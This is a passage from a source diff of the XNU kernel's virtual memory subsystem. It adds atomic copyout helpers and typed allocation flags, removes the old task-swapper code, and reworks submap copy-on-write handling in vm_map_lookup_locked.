vm_map_switch(oldmap); + vm_map_deallocate(map); + } + return kr; +} + +kern_return_t +copyoutmap_atomic64( + vm_map_t map, + uint64_t value, + vm_map_address_t toaddr) +{ + kern_return_t kr = KERN_SUCCESS; + vm_map_t oldmap; + + if (vm_map_pmap(map) == pmap_kernel()) { + /* assume a correct toaddr */ + *(uint64_t *)toaddr = value; + } else if (current_map() == map) { + if (copyout_atomic64(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + } else { + vm_map_reference(map); + oldmap = vm_map_switch(map); + if (copyout_atomic64(value, toaddr) != 0) { + kr = KERN_INVALID_ADDRESS; + } + vm_map_switch(oldmap); + vm_map_deallocate(map); + } + return kr; +} + /* * * The following two functions are to be used when exposing kernel diff --git a/osfmk/vm/vm_kern.h b/osfmk/vm/vm_kern.h index 2cafcebe2..5dd4cfda6 100644 --- a/osfmk/vm/vm_kern.h +++ b/osfmk/vm/vm_kern.h @@ -80,31 +80,39 @@ extern "C" { #include +struct vm_page; + +__options_decl(kma_flags_t, uint32_t, { + KMA_NONE = 0x00000000, + KMA_HERE = 0x00000001, + KMA_NOPAGEWAIT = 0x00000002, + KMA_KOBJECT = 0x00000004, + KMA_LOMEM = 0x00000008, + KMA_GUARD_FIRST = 0x00000010, + KMA_GUARD_LAST = 0x00000020, + KMA_PERMANENT = 0x00000040, + KMA_NOENCRYPT = 0x00000080, + KMA_KSTACK = 0x00000100, + KMA_VAONLY = 0x00000200, + /* + * Pages belonging to the compressor are not on the paging queues, + * nor are they counted as wired. + */ + KMA_COMPRESSOR = 0x00000400, + KMA_ATOMIC = 0x00000800, + KMA_ZERO = 0x00001000, + KMA_PAGEABLE = 0x00002000, + KMA_KHEAP = 0x00004000, /* Pages belonging to zones backing one of kalloc_heap. */ +}); + extern kern_return_t kernel_memory_allocate( vm_map_t map, vm_offset_t *addrp, vm_size_t size, vm_offset_t mask, - int flags, + kma_flags_t flags, vm_tag_t tag); -/* flags for kernel_memory_allocate */ -#define KMA_HERE 0x01 -#define KMA_NOPAGEWAIT 0x02 -#define KMA_KOBJECT 0x04 -#define KMA_LOMEM 0x08 -#define KMA_GUARD_FIRST 0x10 -#define KMA_GUARD_LAST 0x20 -#define KMA_PERMANENT 0x40 -#define KMA_NOENCRYPT 0x80 -#define KMA_KSTACK 0x100 -#define KMA_VAONLY 0x200 -#define KMA_COMPRESSOR 0x400 /* Pages belonging to the compressor are not on the paging queues, nor are they counted as wired. */ -#define KMA_ATOMIC 0x800 -#define KMA_ZERO 0x1000 -#define KMA_PAGEABLE 0x2000 -#define KMA_KHEAP 0x4000 /* Pages belonging to zones backing one of kalloc_heap. */ - extern kern_return_t kmem_alloc( vm_map_t map, vm_offset_t *addrp, @@ -118,7 +126,7 @@ extern kern_return_t kmem_alloc_contig( vm_offset_t mask, ppnum_t max_pnum, ppnum_t pnum_mask, - int flags, + kma_flags_t flags, vm_tag_t tag); extern kern_return_t kmem_alloc_flags( @@ -126,7 +134,7 @@ extern kern_return_t kmem_alloc_flags( vm_offset_t *addrp, vm_size_t size, vm_tag_t tag, - int flags); + kma_flags_t flags); extern kern_return_t kmem_alloc_pageable( vm_map_t map, @@ -169,18 +177,26 @@ extern kern_return_t kmem_alloc_kobject( vm_size_t size, vm_tag_t tag) __XNU_INTERNAL(kmem_alloc_kobject); +extern void kernel_memory_populate_with_pages( + vm_map_t map, + vm_offset_t addr, + vm_size_t size, + struct vm_page *page_list, + kma_flags_t flags, + vm_tag_t tag); + extern kern_return_t kernel_memory_populate( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + kma_flags_t flags, vm_tag_t tag); extern void kernel_memory_depopulate( vm_map_t map, vm_offset_t addr, vm_size_t size, - int flags, + kma_flags_t flags, vm_tag_t tag); extern kern_return_t memory_object_iopl_request( @@ -224,10 +240,8 @@ extern void vm_tag_update_size(vm_tag_t tag, int64_t size); #if VM_MAX_TAG_ZONES extern void vm_allocation_zones_init(void); -extern void vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx); -extern void vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste); - -extern vm_allocation_zone_total_t ** vm_allocation_zone_totals; +extern vm_tag_t vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags); +extern void vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta); #endif /* VM_MAX_TAG_ZONES */ @@ -299,6 +313,16 @@ extern kern_return_t copyoutmap( vm_map_offset_t toaddr, vm_size_t length); +extern kern_return_t copyoutmap_atomic32( + vm_map_t map, + uint32_t value, + vm_map_offset_t toaddr); + +extern kern_return_t copyoutmap_atomic64( + vm_map_t map, + uint64_t value, + vm_map_offset_t toaddr); + extern kern_return_t kmem_alloc_external( vm_map_t map, vm_offset_t *addrp, diff --git a/osfmk/vm/vm_map.c b/osfmk/vm/vm_map.c index 436bd9368..abe95ed4a 100644 --- a/osfmk/vm/vm_map.c +++ b/osfmk/vm/vm_map.c @@ -63,7 +63,6 @@ * Virtual memory mapping module. */ -#include #include #include @@ -83,7 +82,7 @@ #include #include -#include +#include #include #include #include @@ -298,7 +297,6 @@ static kern_return_t vm_map_remap_extract( vm_map_t map, vm_map_offset_t addr, vm_map_size_t size, - vm_prot_t required_protection, boolean_t copy, struct vm_map_header *map_header, vm_prot_t *cur_protection, @@ -693,12 +691,16 @@ vm_map_copy_require(struct vm_map_copy *copy) } /* - * Placeholder object for submap operations. This object is dropped - * into the range by a call to vm_map_find, and removed when - * vm_map_submap creates the submap. + * vm_map_require: + * + * Ensures that the argument is memory allocated from the genuine + * vm map zone. (See zone_id_require_allow_foreign). */ - -vm_object_t vm_submap_object; +void +vm_map_require(vm_map_t map) +{ + zone_id_require_allow_foreign(ZONE_ID_VM_MAP, sizeof(struct _vm_map), map); +} static __startup_data vm_offset_t map_data; static __startup_data vm_size_t map_data_size; @@ -787,6 +789,7 @@ vm_map_apple_protected( vm_object_offset_t crypto_start, crypto_end; int vm_flags; vm_map_kernel_flags_t vmk_flags; + boolean_t cache_pager; vm_flags = 0; vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; @@ -888,6 +891,13 @@ vm_map_apple_protected( crypto_backing_offset = VME_OFFSET(&tmp_entry); } + cache_pager = TRUE; +#if XNU_TARGET_OS_OSX + if (vm_map_is_alien(map)) { + cache_pager = FALSE; + } +#endif /* XNU_TARGET_OS_OSX */ + /* * Lookup (and create if necessary) the protected memory object * matching that VM object. @@ -901,7 +911,8 @@ vm_map_apple_protected( crypto_backing_offset, crypt_info, crypto_start, - crypto_end); + crypto_end, + cache_pager); /* release extra ref on protected object */ vm_object_deallocate(protected_object); @@ -1042,8 +1053,8 @@ vm_map_init(void) sizeof(debug4k_filter)); #endif /* MACH_ASSERT */ - vm_map_zone = zone_create(VM_MAP_ZONE_NAME, sizeof(struct _vm_map), - VM_MAP_ZFLAGS); + vm_map_zone = zone_create_ext(VM_MAP_ZONE_NAME, sizeof(struct _vm_map), + VM_MAP_ZFLAGS, ZONE_ID_VM_MAP, NULL); vm_map_entry_zone = zone_create(mez_name, sizeof(struct vm_map_entry), ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT); @@ -1054,9 +1065,7 @@ vm_map_init(void) */ vm_map_entry_reserved_zone = zone_create_ext(VME_RESERVED_ZONE_NAME, sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS, - ZONE_ID_ANY, ^(zone_t z) { - zone_set_noexpand(z, 64 * kentry_data_size); - }); + ZONE_ID_ANY, NULL); vm_map_copy_zone = zone_create_ext("VM map copies", sizeof(struct vm_map_copy), ZC_NOENCRYPT | ZC_CACHING, ZONE_ID_VM_MAP_COPY, NULL); @@ -1067,9 +1076,9 @@ vm_map_init(void) /* * Add the stolen memory to zones, adjust zone size and stolen counts. */ - zcram(vm_map_zone, map_data, map_data_size); - zcram(vm_map_entry_reserved_zone, kentry_data, kentry_data_size); - zcram(vm_map_holes_zone, map_holes_data, map_holes_data_size); + zone_cram_foreign(vm_map_zone, map_data, map_data_size); + zone_cram_foreign(vm_map_entry_reserved_zone, kentry_data, kentry_data_size); + zone_cram_foreign(vm_map_holes_zone, map_holes_data, map_holes_data_size); /* * Since these are covered by zones, remove them from stolen page accounting. @@ -1135,6 +1144,7 @@ static void vm_map_steal_memory(void) { uint16_t kentry_initial_pages; + uint16_t zone_foreign_pages; map_data_size = zone_get_foreign_alloc_size(VM_MAP_ZONE_NAME, sizeof(struct _vm_map), VM_MAP_ZFLAGS, 1); @@ -1145,8 +1155,8 @@ vm_map_steal_memory(void) * scheme is activated and/or entries are available from the general * map entry pool. */ -#if defined(__LP64__) - kentry_initial_pages = 10; +#if defined(__LP64__) + kentry_initial_pages = (uint16_t)atop(16 * 4096); #else kentry_initial_pages = 6; #endif @@ -1159,6 +1169,10 @@ vm_map_steal_memory(void) kentry_initial_pages *= 1024; } #endif + if (PE_parse_boot_argn("zone_foreign_pages", &zone_foreign_pages, + sizeof(zone_foreign_pages))) { + kentry_initial_pages = zone_foreign_pages; + } kentry_data_size = zone_get_foreign_alloc_size(VME_RESERVED_ZONE_NAME, sizeof(struct vm_map_entry), VM_MAP_RESERVED_ZFLAGS, @@ -1189,12 +1203,12 @@ boolean_t vm_map_supports_hole_optimization = FALSE; void vm_kernel_reserved_entry_init(void) { - zone_prio_refill_configure(vm_map_entry_reserved_zone); + zone_replenish_configure(vm_map_entry_reserved_zone); /* * Once we have our replenish thread set up, we can start using the vm_map_holes zone. */ - zone_prio_refill_configure(vm_map_holes_zone); + zone_replenish_configure(vm_map_holes_zone); vm_map_supports_hole_optimization = TRUE; } @@ -1298,10 +1312,6 @@ vm_map_create_options( result->vmmap_high_start = 0; #endif os_ref_init_count(&result->map_refcnt, &map_refgrp, 1); -#if TASK_SWAPPER - result->res_count = 1; - result->sw_state = MAP_SW_IN; -#endif /* TASK_SWAPPER */ result->pmap = pmap; result->min_offset = min; result->max_offset = max; @@ -1322,6 +1332,7 @@ vm_map_create_options( result->jit_entry_exists = FALSE; result->is_alien = FALSE; result->reserved_regions = FALSE; + result->single_jit = FALSE; /* "has_corpse_footprint" and "holelistenabled" are mutually exclusive */ if (options & VM_MAP_CREATE_CORPSE_FOOTPRINT) { @@ -1508,79 +1519,6 @@ first_free_is_valid( #define vm_map_copy_entry_unlink(copy, entry) \ _vm_map_store_entry_unlink(&(copy)->cpy_hdr, (entry)) -#if MACH_ASSERT && TASK_SWAPPER -/* - * vm_map_res_reference: - * - * Adds another valid residence count to the given map. - * - * Map is locked so this function can be called from - * vm_map_swapin. - * - */ -void -vm_map_res_reference(vm_map_t map) -{ - /* assert map is locked */ - assert(map->res_count >= 0); - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); - if (map->res_count == 0) { - lck_mtx_unlock(&map->s_lock); - vm_map_lock(map); - vm_map_swapin(map); - lck_mtx_lock(&map->s_lock); - ++map->res_count; - vm_map_unlock(map); - } else { - ++map->res_count; - } -} - -/* - * vm_map_reference_swap: - * - * Adds valid reference and residence counts to the given map. - * - * The map may not be in memory (i.e. zero residence count). - * - */ -void -vm_map_reference_swap(vm_map_t map) -{ - assert(map != VM_MAP_NULL); - lck_mtx_lock(&map->s_lock); - assert(map->res_count >= 0); - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); - os_ref_retain_locked(&map->map_refcnt); - vm_map_res_reference(map); - lck_mtx_unlock(&map->s_lock); -} - -/* - * vm_map_res_deallocate: - * - * Decrement residence count on a map; possibly causing swapout. - * - * The map must be in memory (i.e. non-zero residence count). - * - * The map is locked, so this function is callable from vm_map_deallocate. - * - */ -void -vm_map_res_deallocate(vm_map_t map) -{ - assert(map->res_count > 0); - if (--map->res_count == 0) { - lck_mtx_unlock(&map->s_lock); - vm_map_lock(map); - vm_map_swapout(map); - vm_map_unlock(map); - lck_mtx_lock(&map->s_lock); - } - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); -} -#endif /* MACH_ASSERT && TASK_SWAPPER */ - /* * vm_map_destroy: * @@ -1678,193 +1616,6 @@ find_largest_process_vm_map_entries(void) return victim_pid; } -#if TASK_SWAPPER -/* - * vm_map_swapin/vm_map_swapout - * - * Swap a map in and out, either referencing or releasing its resources. - * These functions are internal use only; however, they must be exported - * because they may be called from macros, which are exported. - * - * In the case of swapout, there could be races on the residence count, - * so if the residence count is up, we return, assuming that a - * vm_map_deallocate() call in the near future will bring us back. - * - * Locking: - * -- We use the map write lock for synchronization among races. - * -- The map write lock, and not the simple s_lock, protects the - * swap state of the map. - * -- If a map entry is a share map, then we hold both locks, in - * hierarchical order. - * - * Synchronization Notes: - * 1) If a vm_map_swapin() call happens while swapout in progress, it - * will block on the map lock and proceed when swapout is through. - * 2) A vm_map_reference() call at this time is illegal, and will - * cause a panic. vm_map_reference() is only allowed on resident - * maps, since it refuses to block. - * 3) A vm_map_swapin() call during a swapin will block, and - * proceeed when the first swapin is done, turning into a nop. - * This is the reason the res_count is not incremented until - * after the swapin is complete. - * 4) There is a timing hole after the checks of the res_count, before - * the map lock is taken, during which a swapin may get the lock - * before a swapout about to happen. If this happens, the swapin - * will detect the state and increment the reference count, causing - * the swapout to be a nop, thereby delaying it until a later - * vm_map_deallocate. If the swapout gets the lock first, then - * the swapin will simply block until the swapout is done, and - * then proceed. - * - * Because vm_map_swapin() is potentially an expensive operation, it - * should be used with caution. - * - * Invariants: - * 1) A map with a residence count of zero is either swapped, or - * being swapped. - * 2) A map with a non-zero residence count is either resident, - * or being swapped in. - */ - -int vm_map_swap_enable = 1; - -void -vm_map_swapin(vm_map_t map) -{ - vm_map_entry_t entry; - - if (!vm_map_swap_enable) { /* debug */ - return; - } - - /* - * Map is locked - * First deal with various races. - */ - if (map->sw_state == MAP_SW_IN) { - /* - * we raced with swapout and won. Returning will incr. - * the res_count, turning the swapout into a nop. - */ - return; - } - - /* - * The residence count must be zero. If we raced with another - * swapin, the state would have been IN; if we raced with a - * swapout (after another competing swapin), we must have lost - * the race to get here (see above comment), in which case - * res_count is still 0. - */ - assert(map->res_count == 0); - - /* - * There are no intermediate states of a map going out or - * coming in, since the map is locked during the transition. - */ - assert(map->sw_state == MAP_SW_OUT); - - /* - * We now operate upon each map entry. If the entry is a sub- - * or share-map, we call vm_map_res_reference upon it. - * If the entry is an object, we call vm_object_res_reference - * (this may iterate through the shadow chain). - * Note that we hold the map locked the entire time, - * even if we get back here via a recursive call in - * vm_map_res_reference. - */ - entry = vm_map_first_entry(map); - - while (entry != vm_map_to_entry(map)) { - if (VME_OBJECT(entry) != VM_OBJECT_NULL) { - if (entry->is_sub_map) { - vm_map_t lmap = VME_SUBMAP(entry); - lck_mtx_lock(&lmap->s_lock); - vm_map_res_reference(lmap); - lck_mtx_unlock(&lmap->s_lock); - } else { - vm_object_t object = VME_OBEJCT(entry); - vm_object_lock(object); - /* - * This call may iterate through the - * shadow chain. - */ - vm_object_res_reference(object); - vm_object_unlock(object); - } - } - entry = entry->vme_next; - } - assert(map->sw_state == MAP_SW_OUT); - map->sw_state = MAP_SW_IN; -} - -void -vm_map_swapout(vm_map_t map) -{ - vm_map_entry_t entry; - - /* - * Map is locked - * First deal with various races. - * If we raced with a swapin and lost, the residence count - * will have been incremented to 1, and we simply return. - */ - lck_mtx_lock(&map->s_lock); - if (map->res_count != 0) { - lck_mtx_unlock(&map->s_lock); - return; - } - lck_mtx_unlock(&map->s_lock); - - /* - * There are no intermediate states of a map going out or - * coming in, since the map is locked during the transition. - */ - assert(map->sw_state == MAP_SW_IN); - - if (!vm_map_swap_enable) { - return; - } - - /* - * We now operate upon each map entry. If the entry is a sub- - * or share-map, we call vm_map_res_deallocate upon it. - * If the entry is an object, we call vm_object_res_deallocate - * (this may iterate through the shadow chain). - * Note that we hold the map locked the entire time, - * even if we get back here via a recursive call in - * vm_map_res_deallocate. - */ - entry = vm_map_first_entry(map); - - while (entry != vm_map_to_entry(map)) { - if (VME_OBJECT(entry) != VM_OBJECT_NULL) { - if (entry->is_sub_map) { - vm_map_t lmap = VME_SUBMAP(entry); - lck_mtx_lock(&lmap->s_lock); - vm_map_res_deallocate(lmap); - lck_mtx_unlock(&lmap->s_lock); - } else { - vm_object_t object = VME_OBJECT(entry); - vm_object_lock(object); - /* - * This call may take a long time, - * since it could actively push - * out pages (if we implement it - * that way). - */ - vm_object_res_deallocate(object); - vm_object_unlock(object); - } - } - entry = entry->vme_next; - } - assert(map->sw_state == MAP_SW_IN); - map->sw_state = MAP_SW_OUT; -} - -#endif /* TASK_SWAPPER */ /* * vm_map_lookup_entry: [ internal use only ] @@ -2321,7 +2072,12 @@ vm_map_random_address_for_size( assert(VM_MAP_PAGE_ALIGNED(size, VM_MAP_PAGE_MASK(map))); while (tries < MAX_TRIES_TO_GET_RANDOM_ADDRESS) { - random_addr = ((vm_map_offset_t)random()) << VM_MAP_PAGE_SHIFT(map); + if (startup_phase < STARTUP_SUB_ZALLOC) { + random_addr = (vm_map_offset_t)early_random(); + } else { + random_addr = (vm_map_offset_t)random(); + } + random_addr <<= VM_MAP_PAGE_SHIFT(map); random_addr = vm_map_trunc_page( vm_map_min(map) + (random_addr % addr_space_size), VM_MAP_PAGE_MASK(map)); @@ -2415,7 +2171,7 @@ vm_map_enter( boolean_t overwrite = ((flags & VM_FLAGS_OVERWRITE) != 0); boolean_t no_cache = ((flags & VM_FLAGS_NO_CACHE) != 0); boolean_t is_submap = vmk_flags.vmkf_submap; - boolean_t permanent = vmk_flags.vmkf_permanent; + boolean_t permanent = (((flags & VM_FLAGS_PERMANENT) != 0) || vmk_flags.vmkf_permanent); boolean_t no_copy_on_read = vmk_flags.vmkf_no_copy_on_read; boolean_t entry_for_jit = vmk_flags.vmkf_map_jit; boolean_t iokit_acct = vmk_flags.vmkf_iokit_acct; @@ -4649,7 +4405,9 @@ vm_map_enter_mem_object_helper( (vm_tag_t) copy_vm_alias, /* see comment at end of vm_fault_unwire re. cast*/ copy_object, copy_offset, - ((copy_object == NULL) ? FALSE : copy), + ((copy_object == NULL) + ? FALSE + : (copy || copy_entry->needs_copy)), cur_protection, max_protection, inheritance); @@ -5138,7 +4896,6 @@ vm_map_enter_mem_object_control( vm_object_lock(object); object->ref_count++; - vm_object_res_reference(object); /* * For "named" VM objects, let the pager know that the @@ -6082,6 +5839,7 @@ vm_map_protect( * only. */ max_prot = new_prot & VM_PROT_ALL; + cur_prot = VM_PROT_NONE; kflags = VM_MAP_KERNEL_FLAGS_NONE; kflags.vmkf_remap_prot_copy = TRUE; kflags.vmkf_overwrite_immutable = TRUE; @@ -6089,15 +5847,15 @@ vm_map_protect( kr = vm_map_remap(map, &new_start, end - start, - 0, /* mask */ + 0, /* mask */ VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, kflags, 0, map, start, - TRUE, /* copy-on-write remapping! */ - &cur_prot, - &max_prot, + TRUE, /* copy-on-write remapping! */ + &cur_prot, /* IN/OUT */ + &max_prot, /* IN/OUT */ VM_INHERIT_DEFAULT); if (kr != KERN_SUCCESS) { return kr; @@ -12424,16 +12182,16 @@ vm_map_copy_extract( vm_map_t src_map, vm_map_address_t src_addr, vm_map_size_t len, - vm_prot_t required_prot, boolean_t do_copy, vm_map_copy_t *copy_result, /* OUT */ - vm_prot_t *cur_prot, /* OUT */ - vm_prot_t *max_prot, /* OUT */ + vm_prot_t *cur_prot, /* IN/OUT */ + vm_prot_t *max_prot, /* IN/OUT */ vm_inherit_t inheritance, vm_map_kernel_flags_t vmk_flags) { vm_map_copy_t copy; kern_return_t kr; + vm_prot_t required_cur_prot, required_max_prot; /* * Check for copies of zero bytes. @@ -12455,6 +12213,9 @@ vm_map_copy_extract( DEBUG4K_SHARE("src_map %p src_addr 0x%llx src_end 0x%llx\n", src_map, (uint64_t)src_addr, (uint64_t)(src_addr + len)); } + required_cur_prot = *cur_prot; + required_max_prot = *max_prot; + /* * Allocate a header element for the list. * @@ -12474,19 +12235,20 @@ vm_map_copy_extract( kr = vm_map_remap_extract(src_map, src_addr, len, - required_prot, - do_copy, /* copy */ + do_copy, /* copy */ ©->cpy_hdr, - cur_prot, - max_prot, + cur_prot, /* IN/OUT */ + max_prot, /* IN/OUT */ inheritance, vmk_flags); if (kr != KERN_SUCCESS) { vm_map_copy_discard(copy); return kr; } - assert((*cur_prot & required_prot) == required_prot); - assert((*max_prot & required_prot) == required_prot); + if (required_cur_prot != VM_PROT_NONE) { + assert((*cur_prot & required_cur_prot) == required_cur_prot); + assert((*max_prot & required_max_prot) == required_max_prot); + } *copy_result = copy; return KERN_SUCCESS; @@ -12921,7 +12683,7 @@ vm_map_fork( #endif /* PMAP_CREATE_FORCE_4K_PAGES */ new_pmap = pmap_create_options(ledger, (vm_map_size_t) 0, pmap_flags); - vm_map_reference_swap(old_map); + vm_map_reference(old_map); vm_map_lock(old_map); map_create_options = 0; @@ -13209,6 +12971,19 @@ vm_map_exec( return KERN_SUCCESS; } +uint64_t vm_map_lookup_locked_copy_slowly_count = 0; +uint64_t vm_map_lookup_locked_copy_slowly_size = 0; +uint64_t vm_map_lookup_locked_copy_slowly_max = 0; +uint64_t vm_map_lookup_locked_copy_slowly_restart = 0; +uint64_t vm_map_lookup_locked_copy_slowly_error = 0; +uint64_t vm_map_lookup_locked_copy_strategically_count = 0; +uint64_t vm_map_lookup_locked_copy_strategically_size = 0; +uint64_t vm_map_lookup_locked_copy_strategically_max = 0; +uint64_t vm_map_lookup_locked_copy_strategically_restart = 0; +uint64_t vm_map_lookup_locked_copy_strategically_error = 0; +uint64_t vm_map_lookup_locked_copy_shadow_count = 0; +uint64_t vm_map_lookup_locked_copy_shadow_size = 0; +uint64_t vm_map_lookup_locked_copy_shadow_max = 0; /* * vm_map_lookup_locked: * @@ -13262,6 +13037,7 @@ vm_map_lookup_locked( boolean_t mask_protections; boolean_t force_copy; boolean_t no_force_copy_if_executable; + boolean_t submap_needed_copy; vm_prot_t original_fault_type; vm_map_size_t fault_page_mask; @@ -13324,6 +13100,7 @@ RetryLookup: * returned locked. */ + submap_needed_copy = FALSE; submap_recurse: if (entry->is_sub_map) { vm_map_offset_t local_vaddr; @@ -13384,6 +13161,9 @@ submap_recurse: } } } else { + if (entry->needs_copy) { + submap_needed_copy = TRUE; + } vm_map_lock_read(VME_SUBMAP(entry)); *var_map = VME_SUBMAP(entry); /* leave map locked if it is a target */ @@ -13453,8 +13233,9 @@ RetrySubMap: vm_object_offset_t copy_offset; vm_map_offset_t local_start; vm_map_offset_t local_end; - boolean_t copied_slowly = FALSE; - vm_object_offset_t copied_slowly_phys_offset = 0; + boolean_t object_copied = FALSE; + vm_object_offset_t object_copied_offset = 0; + boolean_t object_copied_needs_copy = FALSE; kern_return_t kr = KERN_SUCCESS; if (vm_map_lock_read_to_write(map)) { @@ -13492,38 +13273,38 @@ RetrySubMap: /* an entry in our space to the underlying */ /* object in the submap, bypassing the */ /* submap. */ - - if (submap_entry->wired_count != 0 || - (sub_object->copy_strategy != - MEMORY_OBJECT_COPY_SYMMETRIC)) { - if ((submap_entry->protection & VM_PROT_EXECUTE) && - no_force_copy_if_executable) { -// printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy); - if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) { - vm_map_unlock(cow_sub_map_parent); - } - if ((*real_map != map) - && (*real_map != cow_sub_map_parent)) { - vm_map_unlock(*real_map); - } - *real_map = map; - vm_map_lock_write_to_read(map); - kr = KERN_PROTECTION_FAILURE; - DTRACE_VM4(submap_no_copy_executable, - vm_map_t, map, - vm_object_offset_t, submap_entry_offset, - vm_object_size_t, submap_entry_size, - int, kr); - return kr; + submap_entry_offset = VME_OFFSET(submap_entry); + submap_entry_size = submap_entry->vme_end - submap_entry->vme_start; + + if ((submap_entry->wired_count != 0 || + sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) && + (submap_entry->protection & VM_PROT_EXECUTE) && + no_force_copy_if_executable) { +// printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy); + if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) { + vm_map_unlock(cow_sub_map_parent); + } + if ((*real_map != map) + && (*real_map != cow_sub_map_parent)) { + vm_map_unlock(*real_map); } + *real_map = map; + vm_map_lock_write_to_read(map); + kr = KERN_PROTECTION_FAILURE; + DTRACE_VM4(submap_no_copy_executable, + vm_map_t, map, + vm_object_offset_t, submap_entry_offset, + vm_object_size_t, submap_entry_size, + int, kr); + return kr; + } + if (submap_entry->wired_count != 0) { vm_object_reference(sub_object); assertf(VM_MAP_PAGE_ALIGNED(VME_OFFSET(submap_entry), VM_MAP_PAGE_MASK(map)), "submap_entry %p offset 0x%llx\n", submap_entry, VME_OFFSET(submap_entry)); - submap_entry_offset = VME_OFFSET(submap_entry); - submap_entry_size = submap_entry->vme_end - submap_entry->vme_start; DTRACE_VM6(submap_copy_slowly, vm_map_t, cow_sub_map_parent, @@ -13544,9 +13325,11 @@ RetrySubMap: submap_entry_size, FALSE, ©_object); - copied_slowly = TRUE; + object_copied = TRUE; + object_copied_offset = 0; /* 4k: account for extra offset in physical page */ - copied_slowly_phys_offset = submap_entry_offset - vm_object_trunc_page(submap_entry_offset); + object_copied_offset += submap_entry_offset - vm_object_trunc_page(submap_entry_offset); + object_copied_needs_copy = FALSE; vm_object_deallocate(sub_object); vm_map_lock(map); @@ -13564,11 +13347,12 @@ RetrySubMap: vm_object_deallocate(copy_object); copy_object = VM_OBJECT_NULL; vm_map_lock_write_to_read(map); - DTRACE_VM4(submap_copy_slowly, + DTRACE_VM4(submap_copy_error_slowly, vm_object_t, sub_object, vm_object_offset_t, submap_entry_offset, vm_object_size_t, submap_entry_size, int, kr); + vm_map_lookup_locked_copy_slowly_error++; return kr; } @@ -13582,10 +13366,73 @@ RetrySubMap: vm_object_deallocate(copy_object); copy_object = VM_OBJECT_NULL; vm_map_lock_write_to_read(map); + vm_map_lookup_locked_copy_slowly_restart++; + goto RetrySubMap; + } + vm_map_lookup_locked_copy_slowly_count++; + vm_map_lookup_locked_copy_slowly_size += submap_entry_size; + if (submap_entry_size > vm_map_lookup_locked_copy_slowly_max) { + vm_map_lookup_locked_copy_slowly_max = submap_entry_size; + } + } else if (sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) { + submap_entry_offset = VME_OFFSET(submap_entry); + copy_object = VM_OBJECT_NULL; + object_copied_offset = submap_entry_offset; + object_copied_needs_copy = FALSE; + DTRACE_VM6(submap_copy_strategically, + vm_map_t, cow_sub_map_parent, + vm_map_offset_t, vaddr, + vm_map_t, map, + vm_object_size_t, submap_entry_size, + int, submap_entry->wired_count, + int, sub_object->copy_strategy); + kr = vm_object_copy_strategically( + sub_object, + submap_entry_offset, + submap_entry->vme_end - submap_entry->vme_start, + ©_object, + &object_copied_offset, + &object_copied_needs_copy); + if (kr == KERN_MEMORY_RESTART_COPY) { + old_start -= start_delta; + old_end += end_delta; + vm_object_deallocate(copy_object); + copy_object = VM_OBJECT_NULL; + vm_map_lock_write_to_read(map); + vm_map_lookup_locked_copy_strategically_restart++; goto RetrySubMap; } + if (kr != KERN_SUCCESS) { + if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) { + vm_map_unlock(cow_sub_map_parent); + } + if ((*real_map != map) + && (*real_map != cow_sub_map_parent)) { + vm_map_unlock(*real_map); + } + *real_map = map; + vm_object_deallocate(copy_object); + copy_object = VM_OBJECT_NULL; + vm_map_lock_write_to_read(map); + DTRACE_VM4(submap_copy_error_strategically, + vm_object_t, sub_object, + vm_object_offset_t, submap_entry_offset, + vm_object_size_t, submap_entry_size, + int, kr); + vm_map_lookup_locked_copy_strategically_error++; + return kr; + } + assert(copy_object != VM_OBJECT_NULL); + assert(copy_object != sub_object); + object_copied = TRUE; + vm_map_lookup_locked_copy_strategically_count++; + vm_map_lookup_locked_copy_strategically_size += submap_entry_size; + if (submap_entry_size > vm_map_lookup_locked_copy_strategically_max) { + vm_map_lookup_locked_copy_strategically_max = submap_entry_size; + } } else { /* set up shadow object */ + object_copied = FALSE; copy_object = sub_object; vm_object_lock(sub_object); vm_object_reference_locked(sub_object); @@ -13617,6 +13464,11 @@ RetrySubMap: VM_MAP_PAGE_SIZE(map), submap_entry->vme_start, prot); + vm_map_lookup_locked_copy_shadow_count++; + vm_map_lookup_locked_copy_shadow_size += submap_entry_size; + if (submap_entry_size > vm_map_lookup_locked_copy_shadow_max) { + vm_map_lookup_locked_copy_shadow_max = submap_entry_size; + } } /* @@ -13664,7 +13516,7 @@ RetrySubMap: uint64_t, (uint64_t)entry->vme_start, uint64_t, (uint64_t)entry->vme_end, vm_map_offset_t, vaddr, - int, copied_slowly); + int, object_copied); return KERN_INVALID_ADDRESS; } @@ -13754,17 +13606,16 @@ RetrySubMap: entry->protection &= ~VM_PROT_EXECUTE; } - if (copied_slowly) { - VME_OFFSET_SET(entry, local_start - old_start + copied_slowly_phys_offset); - entry->needs_copy = FALSE; + if (object_copied) { + VME_OFFSET_SET(entry, local_start - old_start + object_copied_offset); + entry->needs_copy = object_copied_needs_copy; entry->is_shared = FALSE; } else { - VME_OFFSET_SET(entry, copy_offset); + assert(VME_OBJECT(entry) != VM_OBJECT_NULL); + assert(VME_OBJECT(entry)->copy_strategy == MEMORY_OBJECT_COPY_SYMMETRIC); assert(entry->wired_count == 0); + VME_OFFSET_SET(entry, copy_offset); entry->needs_copy = TRUE; - if (entry->inheritance == VM_INHERIT_SHARE) { - entry->inheritance = 